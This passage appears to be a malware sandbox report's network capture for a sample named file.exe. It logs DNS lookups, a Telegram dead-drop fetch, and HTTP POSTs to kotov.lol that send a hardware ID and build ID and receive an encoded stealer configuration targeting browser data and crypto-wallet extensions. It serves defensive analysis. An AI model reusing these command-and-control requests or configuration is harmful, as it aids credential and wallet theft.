                                                                                                                    Nov 30, 2024 11:36:04.313652039 CET49924443192.168.2.413.107.246.63
                                                                                                                    Nov 30, 2024 11:36:04.313731909 CET4434992413.107.246.63192.168.2.4
                                                                                                                    Nov 30, 2024 11:36:04.313815117 CET49924443192.168.2.413.107.246.63
                                                                                                                    Nov 30, 2024 11:36:04.313966036 CET49924443192.168.2.413.107.246.63
                                                                                                                    Nov 30, 2024 11:36:04.313997984 CET4434992413.107.246.63192.168.2.4
                                                                                                                    Nov 30, 2024 11:36:04.676501989 CET4434992113.107.246.63192.168.2.4
                                                                                                                    Nov 30, 2024 11:36:04.678136110 CET49921443192.168.2.413.107.246.63
                                                                                                                    Nov 30, 2024 11:36:04.678145885 CET4434992113.107.246.63192.168.2.4
                                                                                                                    Nov 30, 2024 11:36:04.678658009 CET49921443192.168.2.413.107.246.63
                                                                                                                    Nov 30, 2024 11:36:04.678661108 CET4434992113.107.246.63192.168.2.4
                                                                                                                    Nov 30, 2024 11:36:04.762795925 CET4434992013.107.246.63192.168.2.4
                                                                                                                    Nov 30, 2024 11:36:04.762845993 CET4434992013.107.246.63192.168.2.4
                                                                                                                    Nov 30, 2024 11:36:04.762912989 CET49920443192.168.2.413.107.246.63
                                                                                                                    Nov 30, 2024 11:36:04.763148069 CET49920443192.168.2.413.107.246.63
                                                                                                                    Nov 30, 2024 11:36:04.763164043 CET4434992013.107.246.63192.168.2.4
                                                                                                                    Nov 30, 2024 11:36:04.763173103 CET49920443192.168.2.413.107.246.63
                                                                                                                    Nov 30, 2024 11:36:04.763178110 CET4434992013.107.246.63192.168.2.4
                                                                                                                    Nov 30, 2024 11:36:04.765405893 CET49925443192.168.2.413.107.246.63
                                                                                                                    Nov 30, 2024 11:36:04.765434027 CET4434992513.107.246.63192.168.2.4
                                                                                                                    Nov 30, 2024 11:36:04.765501976 CET49925443192.168.2.413.107.246.63
                                                                                                                    Nov 30, 2024 11:36:04.765611887 CET49925443192.168.2.413.107.246.63
                                                                                                                    Nov 30, 2024 11:36:04.765623093 CET4434992513.107.246.63192.168.2.4
                                                                                                                    Nov 30, 2024 11:36:05.120908022 CET4434992113.107.246.63192.168.2.4
                                                                                                                    Nov 30, 2024 11:36:05.124342918 CET4434992113.107.246.63192.168.2.4
                                                                                                                    Nov 30, 2024 11:36:05.124397039 CET49921443192.168.2.413.107.246.63
                                                                                                                    Nov 30, 2024 11:36:05.124440908 CET49921443192.168.2.413.107.246.63
                                                                                                                    Nov 30, 2024 11:36:05.124452114 CET4434992113.107.246.63192.168.2.4
                                                                                                                    Nov 30, 2024 11:36:05.124459982 CET49921443192.168.2.413.107.246.63
                                                                                                                    Nov 30, 2024 11:36:05.124464989 CET4434992113.107.246.63192.168.2.4
                                                                                                                    Nov 30, 2024 11:36:05.126759052 CET49926443192.168.2.413.107.246.63
                                                                                                                    Nov 30, 2024 11:36:05.126816034 CET4434992613.107.246.63192.168.2.4
                                                                                                                    Nov 30, 2024 11:36:05.126946926 CET49926443192.168.2.413.107.246.63
                                                                                                                    Nov 30, 2024 11:36:05.127062082 CET49926443192.168.2.413.107.246.63
                                                                                                                    Nov 30, 2024 11:36:05.127089977 CET4434992613.107.246.63192.168.2.4
                                                                                                                    Nov 30, 2024 11:36:05.279279947 CET4434992213.107.246.63192.168.2.4
                                                                                                                    Nov 30, 2024 11:36:05.279632092 CET49922443192.168.2.413.107.246.63
                                                                                                                    Nov 30, 2024 11:36:05.279649019 CET4434992213.107.246.63192.168.2.4
                                                                                                                    Nov 30, 2024 11:36:05.280010939 CET49922443192.168.2.413.107.246.63
                                                                                                                    Nov 30, 2024 11:36:05.280019045 CET4434992213.107.246.63192.168.2.4
                                                                                                                    Nov 30, 2024 11:36:05.765585899 CET4434992213.107.246.63192.168.2.4
                                                                                                                    Nov 30, 2024 11:36:05.765654087 CET4434992213.107.246.63192.168.2.4
                                                                                                                    Nov 30, 2024 11:36:05.765707016 CET49922443192.168.2.413.107.246.63
                                                                                                                    Nov 30, 2024 11:36:05.765922070 CET49922443192.168.2.413.107.246.63
                                                                                                                    Nov 30, 2024 11:36:05.765939951 CET4434992213.107.246.63192.168.2.4
                                                                                                                    Nov 30, 2024 11:36:05.765949965 CET49922443192.168.2.413.107.246.63
                                                                                                                    Nov 30, 2024 11:36:05.765954971 CET4434992213.107.246.63192.168.2.4
                                                                                                                    Nov 30, 2024 11:36:05.768644094 CET49927443192.168.2.413.107.246.63
                                                                                                                    Nov 30, 2024 11:36:05.768666983 CET4434992713.107.246.63192.168.2.4
                                                                                                                    Nov 30, 2024 11:36:05.768778086 CET49927443192.168.2.413.107.246.63
                                                                                                                    Nov 30, 2024 11:36:05.768918991 CET49927443192.168.2.413.107.246.63
                                                                                                                    Nov 30, 2024 11:36:05.768932104 CET4434992713.107.246.63192.168.2.4
                                                                                                                    Nov 30, 2024 11:36:05.970313072 CET4434992313.107.246.63192.168.2.4
                                                                                                                    Nov 30, 2024 11:36:05.970706940 CET49923443192.168.2.413.107.246.63
                                                                                                                    Nov 30, 2024 11:36:05.970716000 CET4434992313.107.246.63192.168.2.4
                                                                                                                    Nov 30, 2024 11:36:05.971129894 CET49923443192.168.2.413.107.246.63
                                                                                                                    Nov 30, 2024 11:36:05.971134901 CET4434992313.107.246.63192.168.2.4
                                                                                                                    Nov 30, 2024 11:36:06.094476938 CET4434992413.107.246.63192.168.2.4
                                                                                                                    Nov 30, 2024 11:36:06.094808102 CET49924443192.168.2.413.107.246.63
                                                                                                                    Nov 30, 2024 11:36:06.094836950 CET4434992413.107.246.63192.168.2.4
                                                                                                                    Nov 30, 2024 11:36:06.095210075 CET49924443192.168.2.413.107.246.63
                                                                                                                    Nov 30, 2024 11:36:06.095221996 CET4434992413.107.246.63192.168.2.4
                                                                                                                    Nov 30, 2024 11:36:06.425251007 CET4434992313.107.246.63192.168.2.4
                                                                                                                    Nov 30, 2024 11:36:06.429064035 CET4434992313.107.246.63192.168.2.4
                                                                                                                    Nov 30, 2024 11:36:06.429096937 CET4434992313.107.246.63192.168.2.4
                                                                                                                    Nov 30, 2024 11:36:06.429150105 CET49923443192.168.2.413.107.246.63
                                                                                                                    Nov 30, 2024 11:36:06.429203033 CET49923443192.168.2.413.107.246.63
                                                                                                                    Nov 30, 2024 11:36:06.429212093 CET4434992313.107.246.63192.168.2.4
                                                                                                                    Nov 30, 2024 11:36:06.429222107 CET49923443192.168.2.413.107.246.63
                                                                                                                    Nov 30, 2024 11:36:06.429224968 CET4434992313.107.246.63192.168.2.4
                                                                                                                    Nov 30, 2024 11:36:06.431982994 CET49928443192.168.2.413.107.246.63
                                                                                                                    Nov 30, 2024 11:36:06.432014942 CET4434992813.107.246.63192.168.2.4
                                                                                                                    Nov 30, 2024 11:36:06.432126999 CET49928443192.168.2.413.107.246.63
                                                                                                                    Nov 30, 2024 11:36:06.432302952 CET49928443192.168.2.413.107.246.63
                                                                                                                    Nov 30, 2024 11:36:06.432317019 CET4434992813.107.246.63192.168.2.4
                                                                                                                    Nov 30, 2024 11:36:06.542956114 CET4434992413.107.246.63192.168.2.4
                                                                                                                    Nov 30, 2024 11:36:06.544338942 CET4434992513.107.246.63192.168.2.4
                                                                                                                    Nov 30, 2024 11:36:06.544708014 CET49925443192.168.2.413.107.246.63
                                                                                                                    Nov 30, 2024 11:36:06.544729948 CET4434992513.107.246.63192.168.2.4
                                                                                                                    Nov 30, 2024 11:36:06.545139074 CET49925443192.168.2.413.107.246.63
                                                                                                                    Nov 30, 2024 11:36:06.545144081 CET4434992513.107.246.63192.168.2.4
                                                                                                                    Nov 30, 2024 11:36:06.546112061 CET4434992413.107.246.63192.168.2.4
                                                                                                                    Nov 30, 2024 11:36:06.546207905 CET49924443192.168.2.413.107.246.63
                                                                                                                    Nov 30, 2024 11:36:06.546260118 CET49924443192.168.2.413.107.246.63
                                                                                                                    Nov 30, 2024 11:36:06.546286106 CET4434992413.107.246.63192.168.2.4
                                                                                                                    Nov 30, 2024 11:36:06.546324968 CET49924443192.168.2.413.107.246.63
                                                                                                                    Nov 30, 2024 11:36:06.546340942 CET4434992413.107.246.63192.168.2.4
                                                                                                                    Nov 30, 2024 11:36:06.548576117 CET49929443192.168.2.413.107.246.63
                                                                                                                    Nov 30, 2024 11:36:06.548609972 CET4434992913.107.246.63192.168.2.4
                                                                                                                    Nov 30, 2024 11:36:06.548778057 CET49929443192.168.2.413.107.246.63
                                                                                                                    Nov 30, 2024 11:36:06.548914909 CET49929443192.168.2.413.107.246.63
                                                                                                                    Nov 30, 2024 11:36:06.548928976 CET4434992913.107.246.63192.168.2.4

                                                                                                                    UDP Packets

                                                                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                                                                    Nov 30, 2024 11:34:01.792563915 CET5705053192.168.2.41.1.1.1
                                                                                                                    Nov 30, 2024 11:34:01.930721045 CET53570501.1.1.1192.168.2.4
                                                                                                                    Nov 30, 2024 11:34:03.992988110 CET5131353192.168.2.41.1.1.1
                                                                                                                    Nov 30, 2024 11:34:04.463144064 CET53513131.1.1.1192.168.2.4
                                                                                                                    Nov 30, 2024 11:34:17.453881025 CET138138192.168.2.4192.168.2.255
                                                                                                                    Nov 30, 2024 11:34:20.418206930 CET5003553192.168.2.41.1.1.1
                                                                                                                    Nov 30, 2024 11:34:20.418348074 CET6295653192.168.2.41.1.1.1
                                                                                                                    Nov 30, 2024 11:34:20.494823933 CET53491711.1.1.1192.168.2.4
                                                                                                                    Nov 30, 2024 11:34:20.556274891 CET53592661.1.1.1192.168.2.4
                                                                                                                    Nov 30, 2024 11:34:20.556767941 CET53500351.1.1.1192.168.2.4
                                                                                                                    Nov 30, 2024 11:34:20.557079077 CET53629561.1.1.1192.168.2.4
                                                                                                                    Nov 30, 2024 11:34:23.392802000 CET53573381.1.1.1192.168.2.4
                                                                                                                    Nov 30, 2024 11:34:27.316778898 CET5524453192.168.2.41.1.1.1
                                                                                                                    Nov 30, 2024 11:34:27.317223072 CET5520853192.168.2.41.1.1.1
                                                                                                                    Nov 30, 2024 11:34:27.453818083 CET53542001.1.1.1192.168.2.4
                                                                                                                    Nov 30, 2024 11:34:27.456227064 CET53552441.1.1.1192.168.2.4
                                                                                                                    Nov 30, 2024 11:34:27.457669973 CET53552081.1.1.1192.168.2.4

                                                                                                                    DNS Queries

                                                                                                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                    Nov 30, 2024 11:34:01.792563915 CET192.168.2.41.1.1.10xc88aStandard query (0)t.meA (IP address)IN (0x0001)false
                                                                                                                    Nov 30, 2024 11:34:03.992988110 CET192.168.2.41.1.1.10x709fStandard query (0)kotov.lolA (IP address)IN (0x0001)false
                                                                                                                    Nov 30, 2024 11:34:20.418206930 CET192.168.2.41.1.1.10xb5b3Standard query (0)www.google.comA (IP address)IN (0x0001)false
                                                                                                                    Nov 30, 2024 11:34:20.418348074 CET192.168.2.41.1.1.10xfeddStandard query (0)www.google.com65IN (0x0001)false
                                                                                                                    Nov 30, 2024 11:34:27.316778898 CET192.168.2.41.1.1.10xaa9bStandard query (0)apis.google.comA (IP address)IN (0x0001)false
                                                                                                                    Nov 30, 2024 11:34:27.317223072 CET192.168.2.41.1.1.10x3edbStandard query (0)apis.google.com65IN (0x0001)false

                                                                                                                    DNS Answers

                                                                                                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                    Nov 30, 2024 11:34:01.930721045 CET1.1.1.1192.168.2.40xc88aNo error (0)t.me149.154.167.99A (IP address)IN (0x0001)false
                                                                                                                    Nov 30, 2024 11:34:04.463144064 CET1.1.1.1192.168.2.40x709fNo error (0)kotov.lol95.217.25.228A (IP address)IN (0x0001)false
                                                                                                                    Nov 30, 2024 11:34:20.556767941 CET1.1.1.1192.168.2.40xb5b3No error (0)www.google.com142.250.181.100A (IP address)IN (0x0001)false
                                                                                                                    Nov 30, 2024 11:34:20.557079077 CET1.1.1.1192.168.2.40xfeddNo error (0)www.google.com65IN (0x0001)false
                                                                                                                    Nov 30, 2024 11:34:27.456227064 CET1.1.1.1192.168.2.40xaa9bNo error (0)apis.google.complus.l.google.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                    Nov 30, 2024 11:34:27.456227064 CET1.1.1.1192.168.2.40xaa9bNo error (0)plus.l.google.com172.217.17.78A (IP address)IN (0x0001)false
                                                                                                                    Nov 30, 2024 11:34:27.457669973 CET1.1.1.1192.168.2.40x3edbNo error (0)apis.google.complus.l.google.comCNAME (Canonical name)IN (0x0001)false

                                                                                                                    HTTP Request Dependency Graph

                                                                                                                    • t.me
                                                                                                                    • kotov.lol
                                                                                                                    • slscr.update.microsoft.com
                                                                                                                    • www.google.com
                                                                                                                    • fs.microsoft.com
                                                                                                                    • login.live.com
                                                                                                                    • otelrules.azureedge.net

                                                                                                                    HTTPS Proxied Packets

                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    0192.168.2.449730149.154.167.994436976C:\Users\user\Desktop\file.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    2024-11-30 10:34:03 UTC85OUTGET /gv4dlp HTTP/1.1
                                                                                                                    Host: t.me
                                                                                                                    Connection: Keep-Alive
                                                                                                                    Cache-Control: no-cache
                                                                                                                    2024-11-30 10:34:03 UTC511INHTTP/1.1 200 OK
                                                                                                                    Server: nginx/1.18.0
                                                                                                                    Date: Sat, 30 Nov 2024 10:34:03 GMT
                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                    Content-Length: 12292
                                                                                                                    Connection: close
                                                                                                                    Set-Cookie: stel_ssid=7ebb2f8c734889d8b2_5099396923945815117; expires=Sun, 01 Dec 2024 10:34:03 GMT; path=/; samesite=None; secure; HttpOnly
                                                                                                                    Pragma: no-cache
                                                                                                                    Cache-control: no-store
                                                                                                                    X-Frame-Options: ALLOW-FROM https://web.telegram.org
                                                                                                                    Content-Security-Policy: frame-ancestors https://web.telegram.org
                                                                                                                    Strict-Transport-Security: max-age=35768000
                                                                                                                    2024-11-30 10:34:03 UTC12292INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 54 65 6c 65 67 72 61 6d 3a 20 43 6f 6e 74 61 63 74 20 40 67 76 34 64 6c 70 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 73 63 72 69 70 74 3e 74 72 79 7b 69 66 28 77 69 6e 64 6f 77 2e 70 61 72 65 6e 74 21 3d 6e 75 6c 6c 26 26 77 69 6e 64 6f 77 21 3d 77 69 6e 64 6f 77 2e 70 61 72 65 6e 74 29 7b 77 69 6e 64 6f 77 2e 70 61 72 65 6e 74
                                                                                                                    Data Ascii: <!DOCTYPE html><html> <head> <meta charset="utf-8"> <title>Telegram: Contact @gv4dlp</title> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <script>try{if(window.parent!=null&&window!=window.parent){window.parent


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    1192.168.2.44973195.217.25.2284436976C:\Users\user\Desktop\file.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    2024-11-30 10:34:06 UTC224OUTGET / HTTP/1.1
                                                                                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.6 Safari/605.1.15 Ddg/17.6
                                                                                                                    Host: kotov.lol
                                                                                                                    Connection: Keep-Alive
                                                                                                                    Cache-Control: no-cache
                                                                                                                    2024-11-30 10:34:07 UTC158INHTTP/1.1 200 OK
                                                                                                                    Server: nginx
                                                                                                                    Date: Sat, 30 Nov 2024 10:34:06 GMT
                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                    Transfer-Encoding: chunked
                                                                                                                    Connection: close
                                                                                                                    2024-11-30 10:34:07 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                    Data Ascii: 0


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    2192.168.2.44973295.217.25.2284436976C:\Users\user\Desktop\file.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    2024-11-30 10:34:08 UTC316OUTPOST / HTTP/1.1
                                                                                                                    Content-Type: multipart/form-data; boundary=----HIIIDAKKJJJKKECAKKJE
                                                                                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.6 Safari/605.1.15 Ddg/17.6
                                                                                                                    Host: kotov.lol
                                                                                                                    Content-Length: 256
                                                                                                                    Connection: Keep-Alive
                                                                                                                    Cache-Control: no-cache
                                                                                                                    2024-11-30 10:34:08 UTC256OUTData Raw: 2d 2d 2d 2d 2d 2d 48 49 49 49 44 41 4b 4b 4a 4a 4a 4b 4b 45 43 41 4b 4b 4a 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 45 44 35 45 43 45 44 38 46 35 46 37 33 38 39 37 32 35 30 38 33 31 2d 61 33 33 63 37 33 34 30 2d 36 31 63 61 0d 0a 2d 2d 2d 2d 2d 2d 48 49 49 49 44 41 4b 4b 4a 4a 4a 4b 4b 45 43 41 4b 4b 4a 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 63 35 62 61 33 63 32 35 66 61 37 62 38 30 31 31 32 33 34 61 64 30 39 64 37 37 62 36 33 34 66 31 0d 0a 2d 2d 2d 2d 2d 2d 48 49 49 49 44 41 4b 4b 4a 4a 4a 4b 4b 45 43 41 4b 4b 4a 45 2d 2d 0d
                                                                                                                    Data Ascii: ------HIIIDAKKJJJKKECAKKJEContent-Disposition: form-data; name="hwid"ED5ECED8F5F73897250831-a33c7340-61ca------HIIIDAKKJJJKKECAKKJEContent-Disposition: form-data; name="build_id"c5ba3c25fa7b8011234ad09d77b634f1------HIIIDAKKJJJKKECAKKJE--
                                                                                                                    2024-11-30 10:34:09 UTC158INHTTP/1.1 200 OK
                                                                                                                    Server: nginx
                                                                                                                    Date: Sat, 30 Nov 2024 10:34:09 GMT
                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                    Transfer-Encoding: chunked
                                                                                                                    Connection: close
                                                                                                                    2024-11-30 10:34:09 UTC70INData Raw: 33 62 0d 0a 31 7c 31 7c 31 7c 31 7c 36 33 64 37 32 30 30 66 65 33 35 39 31 65 65 30 39 39 35 39 37 33 32 37 31 39 65 37 31 33 37 35 7c 31 7c 31 7c 31 7c 30 7c 30 7c 31 30 30 30 30 30 7c 31 0d 0a 30 0d 0a 0d 0a
                                                                                                                    Data Ascii: 3b1|1|1|1|63d7200fe3591ee09959732719e71375|1|1|1|0|0|100000|10


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    3192.168.2.44973395.217.25.2284436976C:\Users\user\Desktop\file.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    2024-11-30 10:34:11 UTC316OUTPOST / HTTP/1.1
                                                                                                                    Content-Type: multipart/form-data; boundary=----ECBAEBGHDAECBGDGCAKE
                                                                                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.6 Safari/605.1.15 Ddg/17.6
                                                                                                                    Host: kotov.lol
                                                                                                                    Content-Length: 331
                                                                                                                    Connection: Keep-Alive
                                                                                                                    Cache-Control: no-cache
                                                                                                                    2024-11-30 10:34:11 UTC331OUTData Raw: 2d 2d 2d 2d 2d 2d 45 43 42 41 45 42 47 48 44 41 45 43 42 47 44 47 43 41 4b 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 36 33 64 37 32 30 30 66 65 33 35 39 31 65 65 30 39 39 35 39 37 33 32 37 31 39 65 37 31 33 37 35 0d 0a 2d 2d 2d 2d 2d 2d 45 43 42 41 45 42 47 48 44 41 45 43 42 47 44 47 43 41 4b 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 63 35 62 61 33 63 32 35 66 61 37 62 38 30 31 31 32 33 34 61 64 30 39 64 37 37 62 36 33 34 66 31 0d 0a 2d 2d 2d 2d 2d 2d 45 43 42 41 45 42 47 48 44 41 45 43 42 47 44 47 43 41 4b 45 0d 0a 43 6f 6e 74
                                                                                                                    Data Ascii: ------ECBAEBGHDAECBGDGCAKEContent-Disposition: form-data; name="token"63d7200fe3591ee09959732719e71375------ECBAEBGHDAECBGDGCAKEContent-Disposition: form-data; name="build_id"c5ba3c25fa7b8011234ad09d77b634f1------ECBAEBGHDAECBGDGCAKECont
                                                                                                                    2024-11-30 10:34:12 UTC158INHTTP/1.1 200 OK
                                                                                                                    Server: nginx
                                                                                                                    Date: Sat, 30 Nov 2024 10:34:12 GMT
                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                    Transfer-Encoding: chunked
                                                                                                                    Connection: close
                                                                                                                    2024-11-30 10:34:12 UTC2192INData Raw: 38 38 34 0d 0a 52 32 39 76 5a 32 78 6c 49 45 4e 6f 63 6d 39 74 5a 58 78 63 52 32 39 76 5a 32 78 6c 58 45 4e 6f 63 6d 39 74 5a 56 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 45 4d 36 58 46 42 79 62 32 64 79 59 57 30 67 52 6d 6c 73 5a 58 4e 63 52 32 39 76 5a 32 78 6c 58 45 4e 6f 63 6d 39 74 5a 56 78 42 63 48 42 73 61 57 4e 68 64 47 6c 76 62 6c 78 38 59 32 68 79 62 32 31 6c 4c 6d 56 34 5a 58 78 48 62 32 39 6e 62 47 55 67 51 32 68 79 62 32 31 6c 49 45 4e 68 62 6d 46 79 65 58 78 63 52 32 39 76 5a 32 78 6c 58 45 4e 6f 63 6d 39 74 5a 53 42 54 65 46 4e 63 56 58 4e 6c 63 69 42 45 59 58 52 68 66 47 4e 6f 63 6d 39 74 5a 58 77 6c 54 45 39 44 51 55 78 42 55 46 42 45 51 56 52 42 4a 56 78 48 62 32 39 6e 62 47 56 63 51 32 68 79 62 32 31 6c 49 46
                                                                                                                    Data Ascii: 884R29vZ2xlIENocm9tZXxcR29vZ2xlXENocm9tZVxVc2VyIERhdGF8Y2hyb21lfEM6XFByb2dyYW0gRmlsZXNcR29vZ2xlXENocm9tZVxBcHBsaWNhdGlvblx8Y2hyb21lLmV4ZXxHb29nbGUgQ2hyb21lIENhbmFyeXxcR29vZ2xlXENocm9tZSBTeFNcVXNlciBEYXRhfGNocm9tZXwlTE9DQUxBUFBEQVRBJVxHb29nbGVcQ2hyb21lIF


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    4192.168.2.44973495.217.25.2284436976C:\Users\user\Desktop\file.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    2024-11-30 10:34:13 UTC316OUTPOST / HTTP/1.1
                                                                                                                    Content-Type: multipart/form-data; boundary=----DAAAFBKECAKEHIEBAFIE
                                                                                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.6 Safari/605.1.15 Ddg/17.6
                                                                                                                    Host: kotov.lol
                                                                                                                    Content-Length: 331
                                                                                                                    Connection: Keep-Alive
                                                                                                                    Cache-Control: no-cache
                                                                                                                    2024-11-30 10:34:13 UTC331OUTData Raw: 2d 2d 2d 2d 2d 2d 44 41 41 41 46 42 4b 45 43 41 4b 45 48 49 45 42 41 46 49 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 36 33 64 37 32 30 30 66 65 33 35 39 31 65 65 30 39 39 35 39 37 33 32 37 31 39 65 37 31 33 37 35 0d 0a 2d 2d 2d 2d 2d 2d 44 41 41 41 46 42 4b 45 43 41 4b 45 48 49 45 42 41 46 49 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 63 35 62 61 33 63 32 35 66 61 37 62 38 30 31 31 32 33 34 61 64 30 39 64 37 37 62 36 33 34 66 31 0d 0a 2d 2d 2d 2d 2d 2d 44 41 41 41 46 42 4b 45 43 41 4b 45 48 49 45 42 41 46 49 45 0d 0a 43 6f 6e 74
                                                                                                                    Data Ascii: ------DAAAFBKECAKEHIEBAFIEContent-Disposition: form-data; name="token"63d7200fe3591ee09959732719e71375------DAAAFBKECAKEHIEBAFIEContent-Disposition: form-data; name="build_id"c5ba3c25fa7b8011234ad09d77b634f1------DAAAFBKECAKEHIEBAFIECont
                                                                                                                    2024-11-30 10:34:14 UTC158INHTTP/1.1 200 OK
                                                                                                                    Server: nginx
                                                                                                                    Date: Sat, 30 Nov 2024 10:34:14 GMT
                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                    Transfer-Encoding: chunked
                                                                                                                    Connection: close
                                                                                                                    2024-11-30 10:34:14 UTC5837INData Raw: 31 36 63 30 0d 0a 54 57 56 30 59 55 31 68 63 32 74 38 4d 58 78 75 61 32 4a 70 61 47 5a 69 5a 57 39 6e 59 57 56 68 62 32 56 6f 62 47 56 6d 62 6d 74 76 5a 47 4a 6c 5a 6d 64 77 5a 32 74 75 62 6e 77 78 66 44 42 38 4d 48 78 4e 5a 58 52 68 54 57 46 7a 61 33 77 78 66 47 52 71 59 32 78 6a 61 32 74 6e 62 47 56 6a 61 47 39 76 59 6d 78 75 5a 32 64 6f 5a 47 6c 75 62 57 56 6c 62 57 74 69 5a 32 4e 70 66 44 46 38 4d 48 77 77 66 45 31 6c 64 47 46 4e 59 58 4e 72 66 44 46 38 5a 57 70 69 59 57 78 69 59 57 74 76 63 47 78 6a 61 47 78 6e 61 47 56 6a 5a 47 46 73 62 57 56 6c 5a 57 46 71 62 6d 6c 74 61 47 31 38 4d 58 77 77 66 44 42 38 56 48 4a 76 62 6b 78 70 62 6d 74 38 4d 58 78 70 59 6d 35 6c 61 6d 52 6d 61 6d 31 74 61 33 42 6a 62 6d 78 77 5a 57 4a 72 62 47 31 75 61 32 39 6c 62
                                                                                                                    Data Ascii: 16c0TWV0YU1hc2t8MXxua2JpaGZiZW9nYWVhb2VobGVmbmtvZGJlZmdwZ2tubnwxfDB8MHxNZXRhTWFza3wxfGRqY2xja2tnbGVjaG9vYmxuZ2doZGlubWVlbWtiZ2NpfDF8MHwwfE1ldGFNYXNrfDF8ZWpiYWxiYWtvcGxjaGxnaGVjZGFsbWVlZWFqbmltaG18MXwwfDB8VHJvbkxpbmt8MXxpYm5lamRmam1ta3BjbmxwZWJrbG1ua29lb


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    5192.168.2.44973595.217.25.2284436976C:\Users\user\Desktop\file.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    2024-11-30 10:34:16 UTC316OUTPOST / HTTP/1.1
                                                                                                                    Content-Type: multipart/form-data; boundary=----CBFBGCGIJKJJKFIDBFCG
                                                                                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.6 Safari/605.1.15 Ddg/17.6
                                                                                                                    Host: kotov.lol
                                                                                                                    Content-Length: 332
                                                                                                                    Connection: Keep-Alive
                                                                                                                    Cache-Control: no-cache
